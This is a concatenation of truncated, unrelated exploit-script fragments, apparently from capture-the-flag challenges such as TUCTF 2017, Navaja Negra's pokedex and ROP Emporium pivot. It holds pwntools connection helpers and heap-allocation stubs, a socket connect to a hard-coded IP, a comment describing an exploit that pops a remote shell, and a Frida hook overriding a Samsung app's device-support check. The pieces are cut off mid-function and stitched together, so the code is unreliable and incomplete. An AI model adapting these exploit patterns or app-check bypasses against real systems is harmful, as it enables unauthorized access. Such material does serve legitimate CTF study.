from pwn import *
def create(size, content=None):
    s.send("1\n")
    s.recvuntil("Choose the size of prison heap")
    s.send("{}\n".format(size))
    s.recvuntil("Enter the name of the person who is going to enter the prison")
    #sleep(0.5)
    s.send("{}\n".format(content))

import threading
from pwn import *
from socket import *
import struct
from telnetlib import Telnet
class ChatClient:
    def __init__(self, server):

from pwn import *
IP = 'localhost'
PORT = 54321
s = None
def send_msg(msg, size):
    s = remote(IP, PORT)
    COOKIE = "Eko2019\x00"
    s.send(COOKIE + pack(size, 64, 'little', True))

# coding=utf-8
# Writeup: https://elladodelnovato.blogspot.com/2018/10/ctf-nn8ed-navaja-negra-pokedex.html
from pwn import *
env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.27.so")}
s = process("./pokedex_nn2k18", env=env)
#s = remote('challenges.ka0labs.org', 1341)

# -*- coding: utf-8 -*-
'''
TUCTF 2017 - https://tuctf.asciioverflow.com/
temple (500 points) - PWN
--------------------------------------------------------
(Small)Explanation at the end of the file.
--------------------------------------------------------
'''

'''
Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
It pops a remote shell.
Run the binary with: nc -lvc ./pivot -p 4444
Then, run this exploit :)
'''

import socket
from struct import pack
def p(x):
    return pack('<L', x)
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))

Java.perform(function () {
    // Function to hook is defined here
    var HostManagerUtils = Java.use('com.samsung.android.app.twatchmanager.util.HostManagerUtils');
    HostManagerUtils.isSupportedInHostDevice.implementation = function (p1) {
        var result = this.isSupportedInHostDevice(p1);
        console.log("isSupportedInHostDevice return: " + result);